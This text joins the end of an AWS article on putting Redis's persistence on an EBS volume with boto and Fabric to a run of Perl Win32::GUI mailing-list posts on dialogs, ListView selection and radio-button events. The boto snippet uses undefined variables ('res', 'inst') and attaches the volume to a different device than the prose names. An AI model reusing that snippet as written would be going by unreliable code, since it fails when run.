Veli-Pekka T=E4til=E4 <vtatila@...> wrote: > How good is the Win32::GUI timer for semi realtime applications? Pretty much useless. The underlying mechanism (using the WM_TIMER message) has no guarantees on accuracy, and if the application is processing many messages delivery of WM_TIMER messages takes the lowest priority and will likely happen late. > I've > codedd a drum machine, minus some final tweaks and testing, in Perl > using Win32::GUI as the GUI lib and Win32::MIDI for MIDI. I generate my > own note off events (note on velocity 0) so that Win32::MIDI does not > have to sleep. As I want the ability to operate the GUI while the thing > plays back stuff, I use Win32::GUI::Timer as the heart beat for my step > sequencer. I need the ability to time pretty exactly 32th notes from 50 > to 250 bpm (150 to 30 ms), I expect you'll need a different mechanism. Win32 provides special multimedia timer APIs for this purpose (look up timeSetEvent and the related time* functions in MSDN). > since I want to be able to quantize the > user's input to the closest 16th note (step). I'd also need a pretty > exact sleep for generating lag for swing, at max one 32th note and > possibly much smaller values, too. I'm using Win32::Sleep for the swing, > at the moment. Win32::Sleep won't accurately time less that about 50ms (IIRC), especially on older machines. > Timing seems surprisingly stable and even though I use large amounts of > objects (each step is one) and hash lookups Perl's CPU usage shows 0, > even when playing simultaneously 12 parts at 250 bpm. However, at some > pretty normal tempo ranges like 130 to 140 BPM, changing the tempo does > seem to have very little effect. However, if I export the data as MIDi > at 960 PPQ, I use the MIDI Perl modules for that, the tempo does change. Right - WM_TIMER messages get delivered when they can - at some point they stop getting delivered any faster ... Regards, Rob. On 16/08/2007, Perl Rob <perlrob@...> wrote: > Well, I answered my own question, so I thought I'd post the answer > in case it helps someone else who wants to close a window in this > manner. Turns out I had to create a quoted word list and add > WM_CLOSE to it (as a part of my "use Win32::GUI" line): > > use Win32::GUI qw( WM_CLOSE ); > > > To be perfectly honest, I don't understand *why* that fixed the > problem, but it did. I couldn't get any windows to close until I > did that=97now I can close any window (that allows it) by finding > its handle and sending it the WM_CLOSE message. That's the syntax for getting Win32::GUI to import constants into the caller's namespace (in fact it's a very common perl syntax in general). Read the documentation for Win32::GUI::Constants for more information. If you had a 'use warnings;' line, then your earlier attempts would have given you more information about why they were not working. [As an aside you shouldn't blindly assume that sending a window a WM_CLOSE will close it - an application is perfectly entitled to catch the WM_CLOSE message and not close the window - for example many programs catch the WM_CLOSE and pop up a dialog asking whether the user really wants to exit (annoying, but it happens) - this is perhaps more useful if the application is reporting that there are unsaved changes and asking if the user wants to save them before exiting.] Regards, Rob. On 10/08/2007, Veli-Pekka T=E4til=E4 <vtatila@...> wrote: > Is there a method I can call to programmatically click a menu item? I'm > planning on calling it in the Ctrl+N handler in my accelerator table. Not that I'm aware of. > I guess I could call the underlying subs that my menu items call, but > I'd rather have the keyboard control the UI, in stead. In C/C++ you'd create the Accelerator and Menu item with the same ID, and the the OS would do this all automatically for you (both Accelerators and Menu items generate WM_COMMAND messages, with a flag set to indicate which was used, but I don't see a way to utilise this functionality with Win32::GUI) > Its highly useful > for push buttons, for instance. As the hotkey pushes the button, the > user gets visual feedback and also as a screne reader user, I get > notified of the focus and button state change accordingly. is it > slightly "unorthodox" to click menus in hotkey handlers like that, in > staed of activating the underlying function? As a user I've always > disliked the fact that nothing visual happens when I save using the hot > key. SO I press alt+f, s in stead, and then the screen reader tells me > the file menu opens and closes confirming that something in deed > happened. Part of my desire to try the programmatic clicking of menu > items, too, would be to give this kind of visual feedback, even when the > hotkeys are used. You could probably code the hotkey handler to post 'alt-f' and 's' keystrokes to the thread's message queue, which might work. Regards, Rob.
https://sourceforge.net/p/perl-win32-gui/mailman/perl-win32-gui-users/?viewmonth=200711&viewday=10
CC-MAIN-2017-51
refinedweb
2,386
67.08
Uncyclopedia:Templates/In-universe/Quotes From Uncyclopedia, the content-free encyclopedia The following is a listing of Quote templates. The only quote templates still in normal use are {{Q}}, {{cquote}}, and {{Wilde}}. The use of quotes is generally discouraged in most contexts. Quotes are still used in the Unquotable namespace, but that is a relatively small, and most abandoned, project. Although many articles still have quotes, it is generally suggested start an article with a paragraph, to wit, to avoid placing. Lists of quotes, as with other lists, are discouraged. Additionally, when quoting someone in text, one should use quotation marks and other standard real-world formatting, rather than breaking paragraphs with the use of {{Q}}. For example, one should type that William Shakespeare said, "Brevity is the soul of wit." One should not use Q and say that: “Brevity is the soul of wit” Notice how that introduces an abrupt end to the previous paragraph, and an abrupt end to this one? The flow of ideas is broken, and that is made visually apparent by the nonstandard formatting. There is reason books are written in paragraph form. Although a comic writer may break the rules of formatting and grammar for humor, it should only be done with it is funny in context.
http://uncyclopedia.wikia.com/wiki/Uncyclopedia:Templates/In-universe/Quotes?direction=next&oldid=5458232
CC-MAIN-2015-22
refinedweb
213
62.38
<<cert>> Policy used to name an entity. More... #include <dds_c_infrastructure.h> <<cert>> Policy used to name an entity. The purpose of this QoS is to allow the user to attach naming information to created DDS_Entity objects. It can only be 255 characters in length. It must be a NULL-terminated string allocated with DDS_String_alloc or DDS_String_dup. If the user provides a non-NULL pointer when getting the QoS, then it should point to valid memory that can be written to, to avoid ungraceful failures. The actual name string. [default] "[ENTITY]" [range] Null terminated string with length not exceeding 255. Can be NULL.
https://community.rti.com/static/documentation/connext-micro/2.4.1/doc/html/structDDS__EntityNameQosPolicy.html
CC-MAIN-2022-05
refinedweb
102
60.31
#include "Extensions/Hack Installation.txt" ORG 0x000AC6 BL(0x01AAE0) //Bls to the debug startup routine ORG 0x5C7368 POIN 0x01A675 //Replacing Suspend's effect with the Debug map menu loading routine ORG 0x5C6728 WORD 0x0 //D.Info's draw routine crashes so the game, so we need to 0 it out The Startup Debug MenuThis one isn't really interesting. option 1 Starts the game normally, option 2 resumes your suspended save, and option 3 doesn't seem to do anything. The Map Debug MenuThis is where the cool stuff is. The first option allows you to switch maps using the left and right buttons. pressing a will start the chapter you selected.The second option is supposed to be Debug Info, but it crashes the game.The third option is supposed to allow you to control the weather, but it doesn't do anything.The Fourth Option is supposed to allow you to switch fog on and off, but it doesn't do anything.The Fifth option controls the number of playthroughs of your save. The Sixth option is called Removed. I think it's pretty straightforward.The Seventh option is blank. moving on.The last option is called Good Night and clicking it leaves the menu. Removed Good Night
http://feuniverse.us/t/fe6u-leftover-debug-stuff/3199
CC-MAIN-2018-47
refinedweb
210
76.11
Linux drivers make working with devices so easy - assuming you know how. The most basic of all hardware is the GPIO and the sysfs way of working is now obsolete. Find out what the new way of doing things is all about. This content comes from my newly published book: Buy from Amazon. Choosing A Pi For IoT C and Visual Studio Code Drivers: A First Program The GPIO Character Driver Extract: GPIO Character Driver GPIO Using I/O Control GPIO Events The Device Tree Extract: The DHT22 Some Electronics Pulse Width ModulationExtract: The PWM Driver SPI DevicesExtract: The SPI Driver ***NEW!!! I2C Basics The I2C Linux Driver Advanced I2C Sensor Drivers – Linux IIO & Hwmon 1-Wire Bus Going Further With Drivers Appendix I <ASIN:1871962641> <ASIN:B08W9V7TP9> As far as IoT goes, the fundamental Linux driver is the GPIO driver, which gives you access to the individual GPIO lines. This is another built-in driver and so is like the LED driver introduced in the previous chapter, but it is a character driver and used in a slightly different way. In most cases, when a device is connected via a set of GPIO lines, you usually use a specific device driver. In this way you can almost ignore the GPIO lines and what they are doing. However, there are still simple situations where a full driver would be overkill. If you want to interface a button or an LED, then direct control over the GPIO lines is the most direct way to do the job even if there are Linux LED drivers – see the previous chapter – and even an input driver. Until recently, the standard way to work with GPIO in Linux was to use the sysfs interface. You will see a lot of articles advocating its use and you will encounter many programs making use of it. However, GPIO sysfs was deprecated in Linux 4.8 at the end of 2016 and is due for removal from the kernel in 2020. Of course, it takes time for Linux distributions to make use of the latest kernels. At the time of writing Pi OS of Raspberry Pi IoT in C, Second Edition, ISBN:9781871962635. Its replacement is the GPIO character device and, while this looks superficially like the old sysfs interface, it has many major differences. While. Although it isn’t necessary for simple access to the GPIO lines, it is described in this chapter. The new approach to working with GPIO comes pre-installed in the latest version of Pi OS, but it isn’t supported in earlier versions. If you look in the /dev directory you will find files corresponding to each GPIO controller installed. You will see at least: /dev/gpiochip0 This represents the main GPIO controller and all of the GPIO lines it provides. If you know how sysfs works you might well be expecting instructions on how to read and write to the file from the console. In this case, reading and writing to the file will do you little good as most of the work is carried out using the input/output control system call, ioctl() which cannot be used from the command line. The use of ioctl is typical of a character driver, but it does mean that using the GPIO driver is very different from other file-oriented drivers described later. The next chapter looks at the use of ioctl to directly control the GPIO character device. If you want to explore the GPIO from the command line, you need to install some tools that have been created mainly as examples of using the new device interface. To do this you need to first install them and the GPIOD library that you will use later: sudo apt-get install gpiod libgpiod-dev libgpiod-doc Notice that, if you don’t want to use the library to access the driver, you don’t have to install it – the GPIO driver is loaded as part of the Linux kernel and is ready to use. The GPIOD library is installed along with the tools discussed at the start of the chapter, but you don’t have to use it if you are happy with the ioctl system calls described in the next chapter. The library splits into two parts, the context-less functions and the lower-level functions, which can be considered context-using. In nearly all cases you will want to use the lower-level functions as the contextless functions have some serious drawbacks. Let’s take a look at each in turn. To use the library you will need to, if you haven’t already done so, install it: You also need to add the headers: #define _GNU_SOURCE #include <gpiod.h> and you will need to load a library file. If you are using VS Code you will need to edit settings.json to load the file: { "sshUser": "pi", "sshEndpoint": "192.168.11.170", "remoteDirectory": "/home/pi/Documents/ ${workspaceFolderBasename}", "std": "c99", "libs":"-lgpiod", "header":"" } adding "libs":"-lgpiod". By editing the settings.json file in the top level folder, the setting will apply to all of the subfolders. If you don’t want this to be the case, you need to look into VS Code Workspaces, which allow you to set individual settings in each folder. If you see error messages in VS Code concerning the new header file, you can either ignore them or copy the ARM headers into a sub-folder using the copyARMheaders task. This copies all of the standard headers to a sub-folder called include on the local machine. Notice that this is only necessary to satisfy the local machine’s error checking - the program will run on the remote machine without any problems as long as the header is available there. If you want to do the same job on the command line, add the option: -lgpiod The contextless functions all have ctxless in their names and they work by opening the necessary files, performing the operation and then closing them again. This means you don’t have to keep track of what files are open and what GPIO lines are in use, but you have the overhead and side effects of repeatedly opening and closing files. There are two simple get/set functions: gpiod_ctxless_get_value(“device”, offset, active_low, ”consumer”); gpiod_ctxless_set_value(“device”, offset, value, active_low,”consumer”, callback, param) where device is the name, path, number or label of the gpiochip, usually just 0, and offset is the GPIO number of the line you want to use, value is 0 or 1 according to whether you want the GPIO line set high or low, and active_low sets the state of the line regarded as active. If set to true, 1 sets the line low and vice versa. You usually want to set this to 0 so that 1 sets it high. Replace consumer with the name of the program/user/entity using the GPIO line. The attributes callback and param work together to define a callback function and the parameters passed to it. The callback function is called immediately before the line is closed. The get version of the function returns the current state of the line as a 0 or 1 according to the line state and the setting of active_low. <ASIN:B06XFZC3BX> <ASIN:B0748MPQT4> <ASIN:B08R87H4RR> <ASIN:B07V5JTMV9>
https://i-programmer.info/programming/hardware/14457-pi-iot-in-c-using-linux-drivers-gpio-character-driver.html
CC-MAIN-2021-25
refinedweb
1,221
65.96
canvaselement width height interface HTMLCanvasElement : HTMLElement { attribute unsigned long width; attribute unsigned long height; DOMString toDataURL([Optional] in DOMString type, [Variadic] in any args); Object getContext(in DOMString contextId); }; The canvas element, the canvas element represents an embedded element, the canvas element represents its fallback content instead.. Whenever the width and height attributes are set (whether to a new value or to the previous value), the bitmap and any associated contexts must be cleared back to their initial state and reinitialized with the newly specified coordinate space dimensions. The width and height DOM When the canvas is initialized it must be set to fully transparent black. To draw on the canvas, authors must first obtain a reference to a context using the getContext(contextId) method of the canvas element.. Arguments other than the contextId must be ignored. A future version of this specification will probably define a 3d context (probably based on the OpenGL ES API)., when called with one or more arguments, lower case. When the getContext() method of a canvas element is invoked with 2d as the argument, a CanvasRenderingContext2D object is returned. There is only one CanvasRenderingContext2D object per canvas, so calling the getContext() method with the 2d argument a second time must return the same object.); // pixel manipulation ImageData createImageData(in float sw, in float sh);; }; [IndexGetter, IndexSetter] interface CanvasPixelArray { readonly attribute unsigned long length; }; The canvas attribute must return the canvas element that the context paints on. Unless otherwise stated,. [CSS3COLOR] Each context maintains a stack of drawing states. Drawing states consist of: strokeStyle, fillStyle, globalAlpha, lineWidth, lineCap, lineJoin, miterLimit, shadowOffsetX, shadowOffsetY, shadowBlur, shadowColor, globalCompositeOperation, font, textAlign, textBaseline. The current path and the current bitmap are not part of the drawing state. The current path is persistent, and can only be reset using the beginPath() method. The current bitmap is a property of the canvas, not the context. The save() method must push a copy of the current drawing state onto the drawing state stack. The restore() method must pop the top entry in the drawing state stack, and reset the drawing state it describes. If there is no saved state, the method must do nothing.. All drawing operations are affected by the global compositing attributes, globalAlpha and globalAlpha attribute must initially have the value 1.0.. source-atop source-in source-out source-over(default) destination-atop source-atopbut using the destination image instead of the source image and vice versa. destination-in source-inbut using the destination image instead of the source image and vice versa. destination-out source-outbut using the destination image instead of the source image and vice versa. destination-over source-overbut using the destination image instead of the source image and vice versa. lighter copy xor vendorName-operationName These values are all case-sensitive — they must be used exactly as shown. User agents must not recognize values that are not a case-sensitive match for one of the values given above.. When the context is created, the globalCompositeOperation attribute must initially have the value source-over., and CanvasGradient and CanvasPattern objects must be assigned themselves. [CSS3COLOR] If the value is a string but is not a valid color, or is neither a string, a CanvasGradient, nor a CanvasPattern, then it must be ignored, and the attribute must retain its previous value. On getting, if the value is a color, then the serialization of the color must be returned. Otherwise, if it is not a color but a CanvasGradient or, a U+002E FULL STOP (representing the decimal point), one or more digits in the range 0-9 (U+0030 to U+0039) representing the fractional part of the alpha value, and finally a U+0029 RIGHT PARENTHESIS. When the context is created, the strokeStyle and fillStyle attributes must initially have the string value #000000. There are two types of gradients, linear gradients and radial gradients, both represented by objects implementing the opaque. The addColorStop(offset, color) method on the CanvasGradient interface adds a new stop to a gradient. If the offset is less than 0, greater than 1, infinite, or NaN, then an INDEX_SIZE_ERR exception must be raised. If the color cannot be parsed as a CSS color, createLinearGradient() are infinite or NaN, the method must raise a NOT_SUPPORTED_ERR exception. Otherwise, CanvasGradient initialized with the two specified circles. at that position on the gradient (with the colors coming from the interpolation and extrapolation described above).). Gradients must be painted only where the relevant stroking or filling effects requires that they be drawn. The points in the radial gradient must be transformed as described by the current transformation matrix when rendering.). The method must return a CanvasPattern object suitably initialized.. When the createPattern() method is passed, as its image argument, an animated image, the poster frame of the animation, or the first frame of the animation if there is no poster frame, must be used. The lineWidth attribute gives the width of lines, in coordinate space units. On setting, zero, negative, infinite, and NaN values must be ignored, leaving the value unchanged. When the context is created, lines touch on the inside of the join setting, zero, negative, infinite, and NaN values must be ignored, leaving the value unchanged. When the context is created, the miterLimit attribute must initially have the value 10.0. All drawing operations are affected by the four global shadow attributes. The shadowColor attribute sets the color of the shadow. When the context is created, the shadowColor attribute initially must be fully-transparent black. On getting, the serialization of the color must be returned. On setting, the new value must be parsed as a CSS <color> value and the color assigned. If the value is not a valid color, then it must be ignored, and the attribute must retain its previous value. [CSS3 size of the blurring effect. (The units do not map to coordinate space units, and are not affected by the current transformation matrix.) When the context is created, the shadowBlur attribute must initially have the value 0. On getting, the attribute must return its current value. On setting the attribute must be set to the new value, except if the value is negative, infinite or NaN, in which case the new value must be ignored. When shadows are drawn, they must be rendered as follows: Let A be the source image for which a shadow is being created.. clipping region, and, with the exception of clearRect(), also shadow effects, global alpha, and global composition operators. fillStyle. If either height or width are zero, this method has no effect. The strokeRect(x, y, w, h) method must stroke the specified rectangle's path using the strokeStyle, lineWidth, lineJoin, and (if appropriate)). The context always has a current path. There is only one current path, it is not part of the. Initially, the context's path must have zero subpaths. The points and lines added to the path by these methods must be transformed according to the moveTo() call.) New points and the lines connecting them are added to subpaths using the methods described below. In all cases, the methods only modify the last subpath in the context's paths. The lineTo(x, y) method must do nothing do nothing if the context has no subpaths. Otherwise it must connect the last point in the subpath to the given point (x, y) using a quadratic Bézier curve with control point (cpx, cpy), and must then add the given point (x, y) to the subpath. [BEZIER] The bezierCurveTo(cp1x, cp1y, cp2x, cp2y, x, y) method must do nothing if the context has no subpaths. Otherwise, it. [BEZIER] The arcTo(x1, y1, x2, y2, radius) method must do nothing if the context has no subpaths. If the context does have a subpath, then the behavior depends on the arguments and the last point in the subpath.: if the direction from (x0, y0) to (x1, y1) is the same as the direction from (x1, y1) to (x2, y2), then the). lineWidth, lineCap, lineJoin, and (if appropriate) miterLimit attributes, and then fill the combined stroke area using the shadow effects, global alpha, the clipping region, and. The font DOM attribute, on setting, must be parsed the same way as the 'font' property of CSS (but without supporting property-independent stylesheet syntax like 'inherit'), and the resulting font must be assigned to the context, with the 'line-height' component forced to 'normal'. If the new value is syntactically incorrect, then it must be ignored, without assigning a new font value. [CSS] Font names must be interpreted in the context of the canvas element's stylesheets; any fonts embedded using @font-face must therefore be available. [CSSWEB. [CSSOM] DOM attribute, on getting, must return the current value. On setting, if the value is one of start, end, left, right, or center, then the value must be changed to the new value. Otherwise, the new value must be ignored. When the context is created, the textAlign attribute must initially have the value start. The textBaseline: Let font be the current font of the context, as given by the font attribute. Replace all the space characters in text with U+0020 SPACE characters.. [CSS].. For strokeText() the reverse holds and strokeStyle must be applied to the glyph outlines and fillStyle must be ignored. Text is painted without affecting the current path, and is subject to shadow effects, global alpha, the clipping region, and font attribute, and must then return a new TextMetrics object with its width attribute set to the width of that inline box, in CSS pixels. , the implementation must raise an INDEX_SIZE_ERR must return an createImageData() or getImageData() are infinite or NaN, the method must instead raise a NOT_SUPPORTED_ERR exception. If either the sw or sh arguments are zero, the method must instead raise an INDEX_SIZE_ERR exception. CanvasPixelArray object holding the image data. At least one pixel's worth of image data must be returned. The CanvasPixelArray object thus represents h×w×4 integers. The length attribute of a CanvasPixelArray object must return this number.. When a CanvasPixelArray object is indexed to modify an indexed property index with value value, the value of the indexth component in the array must be set to value. JS undefined values must be converted to zero. Other values must first be converted to numbers using JavaScript's ToNumber algorithm,r convertToIntegerTiesToEven rounding mode. [ECMA262] [IEEE754R] ImageData structures back to the canvas. If any of the arguments to the method are infinite or NaN, the method must raise a NOT_SUPPORTED_ERR exception. If the first argument to the method is null or not an ImageData object. When invoked with arguments that do not, per the last few paragraphs, cause an exception to be raised, the putImageData() method must act as follows:.device+x, dydevice), x, y); ...for any value of x, y, w, and h, and the following two calls: context.createImageData(w, h); context.getImageData(0, 0, w, h); ...must return ImageData objects with the same dimensions, for any value of w and h. In other words, while user agents may round the arguments of these methods so that they map to device pixel boundaries, any rounding performed must be performed consistently for all of the createImageData(), getImageData() and putImageData() operations. The current path, transformation matrix, shadow attributes, global alpha, the clipping region, and global composition operator must not affect the getImageData() and putImageData() methods. The data returned by getImageData() is at the resolution of the canvas backing store, which is likely to not be one device pixel to each CSS pixel if the display used is a high resolution display. In the following example, the script generates an getImageData() and> When a shape or image is painted, user agents must follow these steps, in the order given (or act as if they do): Render the shape or image, creating image A, as described in the previous sections. For shapes, the current fill, stroke, and line styles must be honored, and the stroke must itself also be subjected to the current transformation matrix.. If the id attribute is also specified, both attributes must have the same value. DOM; attribute DOMString href; attribute DOMString target; attribute DOMString ping; attribute DOMString rel; readonly attribute DOMTokenList relList; attribute DOMString media; attribute DOMString hreflang; attribute DOMString type; };: DOMActivateevent in question is not trusted (i.e. a click()method call was the reason for the event being dispatched), and the areaelement's targetattribute is ... then raise an INVALID_ACCESS_ERRexception. areaelement, if any. The DOM attributes alt, coords, href, target, ping, rel, media, hreflang, and type, each must reflect the respective content attributes of the same name. The DOM attribute shape must reflect the shape content attribute, limited to only known values. The DOM attribute relList must reflect the rel content attribute. coloured category for the purposes of the content models in this specification. User agents must handle text other than inter-element whitespace found in MathML elements whose content models do not allow raw a namespace-well-formed XML fragment. The svg element. When the SVG foreignObject element contains elements from the HTML namespace, such elements must all be flow content and must not be interleaved with non-HTML elements. [SVG] greater than zero.. Basically, the dimension attributes can't be used to stretch the image. The width and height DOM attributes on the iframe, embed, object, and video elements must reflect the respective content attributes of the same name.
http://www.w3.org/TR/2009/WD-html5-20090212/the-canvas-element.html
CC-MAIN-2017-43
refinedweb
2,239
53.51
I. Coremark is a tool for a benchmark to help you to select the MCU that meets your system requirements by properly comparison of the performance of various MCU’s. You can measure the core performance so easily as the coremark can be run on any MCU’s. This time, I got a i.MXRT1050-EVK board, and I wanted to know what on earth its performance is like. You should be surprised at the amazing performance! Contents - 1 EVK board to be measured - 2 To get Coremark - 3 Files you need - 4 Base project that I used. - 5 implementation steps - 6 Measurement result - 7 Summary EVK board to be measured As I already mentioned, I used i.MXRT1050-EVK. Actually, the device marking is printed on the device as i.MXRT1052. i.MX RT1050 specification Here are the specification of i.MXRT1050 and features. Program execution This device basically doesn’t integrate any Flash ROM. NO FLASH! It needs to execute the program code out of RAM, SDRAM or QSPI Flash. Support QSPI Flash XIP! Instead, i.MXRT supports QSPI XIP (eXecute In Place) so that the program code can directly be executed from QSPI flash without having to download it in RAM. This approach makes system BOM cost lower than an embedded flash system. Of course, there should be a penalty cycle when you execute from the external memory. For a code that is of importance in processing speed, it is recommend be placed in RAM and executing from there. In oder to compensate the access penalty, relatively large cache(I-cache 32kB, D-cache 32kB) is integrated to boost the system performance. IDE (Integrated Development Environment) I used IAR EWARM for the benchmarking You may want to download from here. ->IAR Embedded Workbench for ARM To get Coremark Now that I will show you how to implement the Coremark. First, you need to download the coremark. You may want to download from EEMBC. After registration, you can download it. . Download here→EEMBC-COREMARK Files you need When you use MCUXPresso SDK, all you need is 5 files in c source(.c), and two files in header files(.h). - core_portme.c - core_portme.h - core_list_join_.c - core_main.c - core_matrix.c - core_util.c - coremark.h These files are needed to modified according to your environment. Now, let’s see the how-to. Base project that I used. I used Hello World sample code which comes with MCUXPresso SDK. I will implement coremark based on this project since everything including startup files and clock configuration is configured in default. If you want to download SDK, you can do it from here.→MCUXpresso SDK implementation steps 1.Add gpt timer driver and coremark source files in project Add GPT driver In order to measure the cycle count for coremark, I used GPT (General Purpose Timer) timer. You can use other timers if available. However, there is not GPT timer driver added in project. You need manually to add it in the project by your self from the path of SDK as showed below. i.MXRT1050 SDK folder/drivers/evkimxrt1050/drivers/ In this folder, there are all the drivers. You can just drag&drop them into drivers group in EWARM project. Add coremark files I made a folder(group) named “coremark” in EWARM project and add coremark files by drag&drop in there the same way as GPT driver. 2.Modify coremark.c Line 89, MAIN_RETURN_TYPE main(void){ needs to be modified as the function name is the same as main(). You can just rename it to a simple function name that you can easily recognize as coremark processs. I renamed it to main_coremark(void). #if MAIN_HAS_NOARGC //MAIN_RETURN_TYPE main(void) { MAIN_RETURN_TYPE main_coremark(void) { int argc=0; char *argv[1]; #else MAIN_RETURN_TYPE main(int argc, char *argv[]) { #endif 3.Modify hello_world.c Added #include “coremark.h” Added #include “fsl_gpt.h” I modified main() function as below. GPT timer is initialized and the clock(IGP clock) is divided by 2. At the top of hello world.c, GPT timer needs to be defined. #define GPT_IRQ_ID GPT1_IRQn #define EXAMPLE_GPT GPT1 #define EXAMPLE_GPT_IRQHandler GPT1_IRQHandler /* Select IPG Clock as PERCLK_CLK clock source */ #define EXAMPLE_GPT_CLOCK_SOURCE_SELECT (0U) /* Clock divider for PERCLK_CLK clock source */ #define EXAMPLE_GPT_CLOCK_DIVIDER_SELECT (0U) /* Get source clock for GPT driver (GPT prescaler = 0) */ #define EXAMPLE_GPT_CLK_FREQ (CLOCK_GetFreq(kCLOCK_IpgClk) / (EXAMPLE_GPT_CLOCK_DIVIDER_SELECT + 1U)) int main(void){ gtp_config_t gptConfig; /* Init board hardware */ BOARD_InitPins(); BOARD_BootClockRUN(); BOARD_InitDebugConsole(); /*Clock setting for GPT*/ CLOCK_SetMux(kCLOCK_PerclkMux, EXAMPLE_GPT_CLOCK_SOURCE_SELECT); CLOCK_SetMux(kCLOCK_PerclkDiv, EXAMPLE_GPT_CLOCK_DIVIDEER_SELECT); /*GPT timer is setup for measurement of coremark */ GPT_GetDefaultConfig(&gptConfig); /* Initialize GPT module */ GPT_Init(EXAMPLE_GPT, &gptConfig); /*Divide GPT clock source frequency by 2 inside GPT module */ GPT_SetClockDivider(EXAMPLE_GPT, 2); /* Start Timer */ PRINTF("¥r¥nStarting GPT Timer..."); GPT_StartTimer(EXAMPLE_GPT); /* Coremark start */ main_coremark(); while(1); } 4.Modify core_portme.h Add #include “stdlib.h” Comment out #define NULL ((void *)0) In this .h file, you need to configure the number of loops to perform coremark and the clock frequency of the timer you use and the compiler information. I configured as below. #define ITERATIONS 30000 //Number of iteration for coremark, for IMXRT1050 It seems be good around 30000. #define CLOCKS_PER_SEC 150000000 //Timer clock frequency #define COMPILER_VERSION "IAR EWARM v8.20.2" //Compiler information #define COMPILER_FLAGS "SPEED" //Compiler flag, I configured it to SPEED in IAR EWARM compiler setting. #define MEM_LOCATION "RAM"// Place of execution Data tyep should be dependent on your environment, but I configure it as I use MCUXpresso SDK. HAS_TIME_H 0 USE_CLOCK 0 HAS_STDIO 1 HAS_PRINTF 1 /************************/ /* Data types and settings */ /************************/ /* Configuration : HAS_FLOAT Define to 1 if the platform supports floating point. */ #ifndef HAS_FLOAT #define HAS_FLOAT 1 #endif /* Configuration : HAS_TIME_H Define to 1 if platform has the time.h header file, and implementation of functions thereof. */ #ifndef HAS_TIME_H //#define HAS_TIME_H 1 #define HAS_TIME_H 0 #endif /* Configuration : USE_CLOCK Define to 1 if platform has the time.h header file, and implementation of functions thereof. */ #ifndef USE_CLOCK //#define USE_CLOCK 1 #define USE_CLOCK 0 #endif /* Configuration : HAS_STDIO Define to 1 if the platform has stdio.h. */ #ifndef HAS_STDIO //#define HAS_STDIO 0 #define HAS_STDIO 1 #endif /* Configuration : HAS_PRINTF Define to 1 if the platform has stdio.h and implements the printf function. */ #ifndef HAS_PRINTF //#define HAS_PRINTF 0 #define HAS_PRINTF 1 #endif 5. Modify core_portme.c Comment out the error part of Barebones_clock() CODETIMETYPE barebones_clock(){ //#error "You must implement a method to measure time in barebones_clock" return GPT_GetCurrentTimeCount(GPT1); } Like above, comment out the part of error in portable_init()内 void portable_init(){ //#error "Call board initialization routines in portable init (if needed), in particular" if (sizeof(ee_ptr_int) != sizeof(ee_u8 *)){ : : 6.Include path of option setting in EWARM Lastly, you need to set the include path in the option setting of EWARM. Sorry, below picture is Japanese window since my PC is Japanese environment. Measurement result The score gives you 2,943! that is way more than I expected!! i.MXRT1050 is 600MHz, so Coremark/MHz is 5.0! I can tell you how much this number is amazing. Cortex-M4F core of Kinetis K60 (100MHz) shows 270 points in coremark and 2.7 in coremark/MHz. It is about 10 times faster than Kinetis MCU, and it is double in coremark/MHz! Summary I showed you how-to of coremark implementation and the measurement result. You can easily implement the coremark for other devices. Basically Coremark can be implemented for any other devices of MCU. You can use it as a reference.
https://mcu-things.com/blog/imxrt-how-to-coremark-implementation/
CC-MAIN-2020-05
refinedweb
1,228
57.16
Haskell IO for Imperative Programmers From HaskellWiki My goal is to help experienced procedural programmers make the transition to Haskell, not to provide a tour of language features. I don’t want to show you how to do imperative programming in Haskell; I want to show you how not to. 1 Introduction There is a widespread misconception that basic input and output is hard to do in Haskell and that therefore the language is not suitable for writing practical programs. I’ve even heard it stated that one must master category theory in order to so much as write to standard output. Nothing could be further from the truth. Witness, main = putStrLn "Hello, world!" About the only way that could be easier would be if there were a “Hello, world!” primitive built into the language, and that would be silly. Stop and think about the basic premise — the whole point of running a program is to have side-effects — no one in their right mind is going to design a language that makes that hard to do. Who here thinks Erik Meijer is a nincompoop? Show of hands? It’s not like he’s brilliant as long as he’s working on VB and then turns into a moron the minute he starts thinking about Haskell. Before proceeding please allow yourself to consider the possibility that IO in Haskell might not be difficult. That said, I will concede that it is also not obvious, but for reasons that don’t have anything to do with category theory. There is a fundamental tension in functional languages. On the one hand you must have side-effects in order to justify all the oxygen you’re consuming, but on the other hand you don’t want side effects because they make it harder to write correct and composable programs. The way to resolve that tension is to think differently. Instead of thinking about IO as something you do, you need to shift gears and think about IO as a result that you achieve. The programming task then becomes one of describing the program’s interaction with the outside world. (That turns out to be a much more powerful idea, the full consequences of which are beyond the scope of this post.) The catch, of course, is that “thinking differently” is one of those things that much easier to say than to do. 2 “Hello, world!” Reloaded Returning to “Hello, world!” — it’s cute, but it’s not a practical example. It doesn’t do any useful work. What is “useful work”? Your most basic utility program (say, to analyze a log file) needs to read some input line-by-line, process it, and write some output. Anything less than that is a waste of time. Coming from an imperative background you’re used to writing programs with this basic template while (<>) { &processIt($_); } So you naturally expect to write something in Haskell that looks like this main = do line <- getLine processIt line main This will work (mostly), but you’re already in trouble. You just don’t know it yet. There are a couple of problems here, so let’s examine the thinking behind it. First, you’ve written a recursive function. You did that because you know Haskell doesn’t have any looping constructs, which is annoying but no big deal so you get over it and get on with your work. Second, there is a very real muddying of concerns. There’s a routine that does input that calls a processing routine that, by implication, if the program is to actually do anything, must be calling an output routine. These are separate issues that should be handled separately, but it’s not clear at this stage how to accomplish that. Let’s talk about the recursion. Recursion can be used, among other things, to express an iteration. I have often stated that you simply don’t write iterative constructs in Haskell. That’s not literally true, I’ve written almost as many as I can count on one hand, but it’s certainly not something you do every day. Not the way every third statement is a for or while in an imperative language. It’s all handled by library functions. If you define a recursive data structure you will provide a collection of routines that iterate over it and no one else ever needs to know the details. If you’re writing an “iterative” program that doesn’t involve an explicit data structure, odds are it can be expressed as an operation over a list fac n = product [1 .. n] Writing Haskell you want to learn to think in terms of operations on aggregates: “do this to that collection.” If you’re sweating the details then you’re probably thinking procedurally. That’s why if you write an iteration it should be taken as a warning sign that you’re not using the language appropriately. Stop and think. As for separation of concerns, let’s flesh out the example a little more and add type signatures. main :: IO () main = do line <- getLine processIt line main processIt :: String -> IO () processIt s = do print (length s) So where are we? We wrote the obvious program to try to actually do something useful with this !@#$% language and instead of saying “see, it’s just as easy as Perl” I told you that it contained two big flashing red lights warning us we’re not using the language correctly. Disgusting, isn’t it? It’s important to realize at this point that the problem isn’t monads. I won’t lie to you, monads are not the easiest thing in the world to wrap your head around and you will need to grok them someday in order to become an effective Haskell programmer, but they don’t even come into the picture at this point. I only mention them because all the other tutorials do and so you’re expecting it. 